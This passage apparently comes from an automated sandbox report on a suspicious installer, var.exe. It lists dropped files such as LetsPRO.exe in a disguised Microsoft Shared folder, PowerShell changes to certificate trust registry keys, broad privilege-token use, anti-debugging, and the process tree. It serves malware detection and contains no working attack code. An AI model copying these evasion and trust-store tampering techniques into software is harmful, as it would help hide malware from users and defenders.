| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\WeGame\Flag | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\DeskUpdate\GlobalMgr.db | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\DeskUpdate\GlobalMgr.db | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\DeskUpdate\GlobalMgr.db | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\WeGame\Flag | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\WeGame\adapt_for_imports.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\log\wegame.20240614-174246-113.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WeGame\log\wegame.mem.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\log\wegame.20240614-174416-452.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\beacon_sdk.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\common.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\Lua51.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\log\wegame.20240614-174216-408.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WeGame\log\wegame.mem.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\log\wegame.20240614-174316-218.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\1 | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcr100.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\WeGame.exe | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WeGame\log\wegame.mem.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WeGame\log\wegame.mem.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WeGame\log\wegame.mem.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\log\wegame.20240614-174346-418.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcp100.dll | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\MSI7C19.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7C69.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5773b9.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7465.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{26E6D275-3FC7-41A2-B8C2-458B639029D2} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7A62.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e5773b9.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7A03.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7B7C.tmp | C:\Windows\system32\msiexec.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000003f3ccc8c3b3921e10000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800003f3ccc8c0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809003f3ccc8c000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d3f3ccc8c000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000003f3ccc8c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\cscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host | C:\Windows\system32\cscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\cscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings | C:\Windows\system32\cscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\system32\cscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\cscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings | C:\Windows\system32\cscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\var.exe
"C:\Users\Admin\AppData\Local\Temp\var.exe"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Install\Install 6.1.9\install\Install.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\var.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1718146308 " AI_EUIMSI=""
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding AEF2F1A18CC526A8DC9ADE0F0459E7CB
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
